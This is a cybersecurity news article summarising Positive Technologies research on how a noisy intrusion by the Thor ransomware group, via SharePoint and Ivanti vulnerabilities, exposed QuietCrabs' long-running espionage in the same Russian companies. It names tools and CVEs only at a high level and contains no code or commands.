Noisy Ransomware Uncovered a Long-Term Espionage Operation
▼ Summary
– A dual cyberattack by the QuietCrabs and Thor groups on Russian companies had an unexpected benefit: Thor’s noisier intrusion drew attention to QuietCrabs’ stealthier, long-term espionage operation.
– Both threat groups exploited known vulnerabilities in Microsoft SharePoint and Ivanti solutions to gain initial access to the victim organizations.
– The QuietCrabs group used custom malware like KrustyLoader and Sliver for espionage, while the Thor group employed common tools like Mimikatz and Rclone, likely for ransomware deployment.
– Researchers believe the attacks were coincidental, not collaborative, as both groups broadly scan for targets, but Thor’s early detection prevented its ransomware from being deployed.
– The investigation revealed QuietCrabs typically remains undetected for nearly 400 days, and Thor has potentially compromised around 110 Russian companies across various sectors.
Discovering a stealthy cyber espionage campaign often requires a stroke of luck, and sometimes that luck comes in the form of a much louder, more disruptive attack. A recent investigation into two Russian companies revealed exactly this scenario, where a ransomware group’s noisy activities inadvertently exposed a long-running, sophisticated espionage operation that had likely been hiding in the shadows. This incident underscores a critical lesson for security teams: a visible breach can sometimes be a distraction from a far more insidious and patient threat.
Security analysts from Positive Technologies detailed a case where two distinct threat groups compromised the same organizations almost simultaneously. The first, known as QuietCrabs, is a cyber espionage actor believed to originate in Asia. The second, tracked as Thor, is a group known for targeting Russian entities with ransomware like LockBit and Babuk. Both attackers gained initial access by exploiting the same set of publicly known vulnerabilities in Microsoft SharePoint Server and various Ivanti solutions.
The intrusion methods, however, diverged sharply. QuietCrabs employed a multi-stage attack chain involving an ASPX web shell, the unique KrustyLoader malware, and the Sliver command-and-control framework. Thor’s approach was less subtle, utilizing a toolkit of common offensive utilities for reconnaissance, privilege escalation, data theft, and persistence. Ironically, it was Thor’s conspicuous activity that triggered the security investigation, leading to the discovery of the far quieter QuietCrabs infection.
Researchers noted the timing was remarkably close, with only a few days separating the groups’ activities. The investigation began when Thor’s actions were first detected. Without this noisy ransomware precursor, the QuietCrabs intrusion might have persisted undetected for a much longer period. Historical data suggests this group maintains an average dwell time of 393 days within victim networks. The confirmation of QuietCrabs’ involvement was solidified by the presence of KrustyLoader, a piece of malware uniquely associated with their operations.
The Thor attribution was based on forensic evidence matching previous reports from other cybersecurity firms. While both groups exploited the same entry points, researchers believe their simultaneous presence was coincidental, resulting from broad scanning campaigns rather than collaboration. The ToolShell vulnerability (CVE-2025-53770) has become a popular gateway for a wide range of threat actors, including Chinese state-sponsored groups and financially motivated ransomware operators.
The targeting profiles of the two groups also differ. QuietCrabs has a global footprint, with victims identified across North America, Europe, and Asia. In contrast, Thor appears to focus predominantly on Russian organizations, with approximately 110 companies potentially affected across various economic sectors. This incident serves as a powerful reminder that a single security event can mask a deeper, more dangerous compromise, and that comprehensive threat hunting is essential even after an immediate incident is contained.
(Source: HelpNet Security)